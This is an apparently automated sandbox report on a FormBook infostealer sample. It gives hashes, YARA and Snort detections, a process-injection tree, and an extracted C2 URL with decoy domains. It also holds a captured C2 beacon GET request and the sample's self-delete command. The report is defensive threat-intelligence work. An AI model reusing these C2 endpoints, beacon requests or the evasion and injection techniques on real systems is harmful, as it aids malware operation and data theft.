Windows Analysis Report
ClbrTLBbVA.exe

Overview

General Information

Sample Name: ClbrTLBbVA.exe
Original Sample Name: 441aa97af8ab929af47af76962584b02.exe
Analysis ID: 838418
MD5: 441aa97af8ab929af47af76962584b02
SHA1: 19179b5b35112d35d1b3514f1026663efb86ef37
SHA256: 1c4a23543bd6562ebedfbc5905ff87a87d06d25a03b1015043314e00befa54dd
Tags: 32exe
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Snort IDS alert for network traffic
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • ClbrTLBbVA.exe (PID: 5252 cmdline: C:\Users\user\Desktop\ClbrTLBbVA.exe MD5: 441AA97AF8AB929AF47AF76962584B02)
    • ClbrTLBbVA.exe (PID: 868 cmdline: {path} MD5: 441AA97AF8AB929AF47AF76962584B02)
    • ClbrTLBbVA.exe (PID: 7108 cmdline: {path} MD5: 441AA97AF8AB929AF47AF76962584B02)
      • explorer.exe (PID: 3452 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • colorcpl.exe (PID: 4764 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: 746F3B5E7652EA0766BA10414D317981)
          • cmd.exe (PID: 5020 cmdline: /c del "C:\Users\user\Desktop\ClbrTLBbVA.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
{"C2 list": ["www.theredorchard.co.uk/ne28/"], "decoy": ["basic-careitem.net", "healstockton.com", "groupetalentapro.com", "geseconevent.com", "adornmentwithadrienne.com", "lazylynx.se", "forestwerx.com", "labishu.com", "hilykan.com", "beyondyoursenses.co.uk", "inno-imc.com", "driverrehab.online", "mantlepies.co.uk", "sicepat.net", "kiwitownkids.com", "infiniumsource.com", "motorsolutionswithmakro.co.uk", "6pg.shop", "zijlont.xyz", "corpusskencar.com", "korthalsgriffonyorkshire.co.uk", "hatchandneststudio.com", "listestubenring.com", "mynarcissist.co.uk", "hfe2wr8zdi1.cfd", "crackthecombination.com", "cycw168.com", "fren.pet", "medicalcannabis.me.uk", "locallooknh.com", "dairecheese.com", "celebrate.rsvp", "foody-people.uk", "11600yy.com", "tuberider.africa", "iamjlfreak.com", "breadpartner.com", "larrgestrreet.site", "savethedateevents.uk", "dongyoufood.com", "jdmgarage.shop", "commonthreadpatterns.com", "ogadriver.africa", "digitalfreakk.com", "poshcompanyandsuites.net", "gogh.live", "easymediarealestate.com", "brandpage.site", "johnhallerconstruction.com", "finemarken.com", "dxyzcmag2020.com", "greengrovetherapy.com", "freshfruits.online", "globalventureproject.info", "themanxlobster.co.uk", "conviord.com", "goodpeoplegb1115.shop", "christiesparis.com", "pnc-verify-support1.com", "cheerleader.social", "forum-sanmonika.online", "dulcescamus.com", "thegolfteeshop.co.uk", "dafabetvn.info"]}
Source | Rule | Description | Author | Strings
0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Diceloader_15eeb7b9 | unknown | unknown
  • 0x1f2e9:$a1: E9 92 9D FF FF C3 E8
0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
Source | Rule | Description | Author | Strings
11.2.ClbrTLBbVA.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
11.2.ClbrTLBbVA.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
11.2.ClbrTLBbVA.exe.400000.0.unpack | Windows_Trojan_Diceloader_15eeb7b9 | unknown | unknown
  • 0x1e4e9:$a1: E9 92 9D FF FF C3 E8
11.2.ClbrTLBbVA.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1bdc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
11.2.ClbrTLBbVA.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          No Sigma rule has matched
Timestamp: 03/30/23-20:53:01.782313
Source IP: 192.168.2.3
Destination IP: 15.197.142.173
SID: 2031412
Source Port: 49699
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/30/23-20:53:01.782313
Source IP: 192.168.2.3
Destination IP: 15.197.142.173
SID: 2031453
Source Port: 49699
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 03/30/23-20:53:01.782313
Source IP: 192.168.2.3
Destination IP: 15.197.142.173
SID: 2031449
Source Port: 49699
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

          AV Detection

Source: ClbrTLBbVA.exe, ReversingLabs: Detection: 32%
Source: ClbrTLBbVA.exe, Virustotal: Detection: 47%
Source: Yara match, File source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: ClbrTLBbVA.exe, Joe Sandbox ML: detected
Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, Malware Configuration Extractor: FormBook
Source: ClbrTLBbVA.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ClbrTLBbVA.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: oGIG5Ul.pdbSHA256 source: ClbrTLBbVA.exe
          Source: Binary string: colorcpl.pdbGCTL source: ClbrTLBbVA.exe, 0000000B.00000002.345989479.0000000001660000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: colorcpl.pdb source: ClbrTLBbVA.exe, 0000000B.00000002.345989479.0000000001660000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: oGIG5Ul.pdb source: ClbrTLBbVA.exe
          Source: Binary string: wntdll.pdbUGP source: ClbrTLBbVA.exe, 0000000B.00000003.291035034.000000000134B000.00000004.00000020.00020000.00000000.sdmp, ClbrTLBbVA.exe, 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.347680713.0000000000F2B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.0000000004640000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.000000000475F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.345656425.0000000000D86000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: ClbrTLBbVA.exe, ClbrTLBbVA.exe, 0000000B.00000003.291035034.000000000134B000.00000004.00000020.00020000.00000000.sdmp, ClbrTLBbVA.exe, 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.347680713.0000000000F2B000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.0000000004640000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000002.529206372.000000000475F000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 0000000D.00000003.345656425.0000000000D86000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 4x nop then pop esi 11_2_004172E6
Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 4x nop then pop esi 11_2_0041731A
Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 4x nop then pop edi 11_2_00416CE8

          Networking

Source: C:\Windows\explorer.exe, Network Connect: 66.235.200.145 80
Source: C:\Windows\explorer.exe, Domain query: www.adornmentwithadrienne.com
Source: Traffic, Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49699 -> 15.197.142.173:80
Source: Traffic, Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49699 -> 15.197.142.173:80
Source: Traffic, Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49699 -> 15.197.142.173:80
Source: Malware configuration extractor, URLs: www.theredorchard.co.uk/ne28/
Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic, HTTP traffic detected: GET /ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj HTTP/1.1 | Host: www.adornmentwithadrienne.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View, IP Address: 66.235.200.145 66.235.200.145
          Source: unknown, DNS traffic detected: queries for: www.adornmentwithadrienne.com
          Source: global traffic, HTTP traffic detected: GET /ne28/?yXB=JRhSHg+E0kVeMb5bWxBNKjX7GZb/Gd7gTaCbDgRTO6UaOuEkMa6xiN+s4LYpa+moX3ut&DR-Hl=f48d7hbXPvmPj HTTP/1.1, Host: www.adornmentwithadrienne.com, Connection: close, Data Raw: 00 00 00 00 00 00 00, Data Ascii:
          Source: ClbrTLBbVA.exe, 00000000.00000002.297081242.00000000008D0000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud

          Source: Yara match, File source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

          System Summary

          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Diceloader_15eeb7b9, Author: unknown
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.ClbrTLBbVA.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Diceloader_15eeb7b9, Author: unknown
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.ClbrTLBbVA.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Diceloader_15eeb7b9, Author: unknown
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.ClbrTLBbVA.exe.37f3360.2.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Diceloader_15eeb7b9, Author: unknown
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.528383336.0000000000740000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Diceloader_15eeb7b9, Author: unknown
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.528812589.0000000000970000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Diceloader_15eeb7b9, Author: unknown
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.345448384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Diceloader_15eeb7b9, Author: unknown
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.526498466.0000000000170000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.345666736.00000000011BF000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Diceloader_15eeb7b9, Author: unknown
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Diceloader_15eeb7b9, Author: unknown
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: ClbrTLBbVA.exe PID: 5252, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: ClbrTLBbVA.exe PID: 7108, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: Process Memory Space: colorcpl.exe PID: 4764, type: MEMORYSTR, Matched rule: Windows_Trojan_Formbook_1112e116, Author: unknown
          Source: ClbrTLBbVA.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: String function: 016AB150 appears 32 times
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_0041A360 NtCreateFile
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_0041A410 NtReadFile
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_0041A490 NtClose
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_0041A540 NtAllocateVirtualMemory
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_0041A35A NtCreateFile
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_0041A40A NtReadFile
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_0041A48B NtClose
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9910 NtAdjustPrivilegesToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E99A0 NtCreateSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9860 NtQuerySystemInformation, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9840 NtDelayExecution, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E98F0 NtReadVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9A50 NtCreateFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9A20 NtResumeThread, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9A00 NtProtectVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9540 NtReadFile, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E95D0 NtClose, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9710 NtQueryInformationToken, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E97A0 NtUnmapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9780 NtMapViewOfSection, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9660 NtAllocateVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E96E0 NtFreeVirtualMemory, LdrInitializeThunk
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9950 NtQueueApcThread
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E99D0 NtCreateProcessEx
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016EB040 NtSuspendThread
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9820 NtEnumerateKey
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E98A0 NtWriteVirtualMemory
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9B00 NtSetValueKey
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016EA3B0 NtGetContextThread
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9A10 NtQuerySection
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9A80 NtOpenDirectoryObject
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9560 NtWriteFile
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9520 NtWaitForSingleObject
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016EAD30 NtSetContextThread
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E95F0 NtQueryInformationFile
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9760 NtOpenProcess
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9770 NtSetInformationFile
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016EA770 NtOpenThread
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9730 NtQueryVirtualMemory
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016EA710 NtOpenProcessToken
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9FE0 NtCreateMutant
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9670 NtQueryInformationProcess
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9650 NtQueryValueKey
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E9610 NtEnumerateValueKey
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe, Code function: 11_2_016E96D0 NtCreateKey
          Source: ClbrTLBbVA.exe, 00000000.00000000.262585621.000000000028A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameoGIG5Ul.exeD vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 00000000.00000002.317381764.0000000006F80000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 00000000.00000002.305424927.000000000294C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 00000000.00000002.310875982.00000000036F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 00000000.00000002.297081242.00000000008D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 0000000B.00000002.346103337.000000000179F000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 0000000B.00000003.291035034.0000000001461000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exe, 0000000B.00000002.345989479.0000000001663000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exeBinary or memory string: OriginalFilenameoGIG5Ul.exeD vs ClbrTLBbVA.exe
          Source: ClbrTLBbVA.exeReversingLabs: Detection: 32%
          Source: ClbrTLBbVA.exeVirustotal: Detection: 47%
          Source: ClbrTLBbVA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\ClbrTLBbVA.exe C:\Users\user\Desktop\ClbrTLBbVA.exe
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exeProcess created: C:\Users\user\Desktop\ClbrTLBbVA.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ClbrTLBbVA.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ClbrTLBbVA.exe.log
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/2@2/1
          Source: ClbrTLBbVA.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2368:120:WilError_01
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Users\user\Desktop\ClbrTLBbVA.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
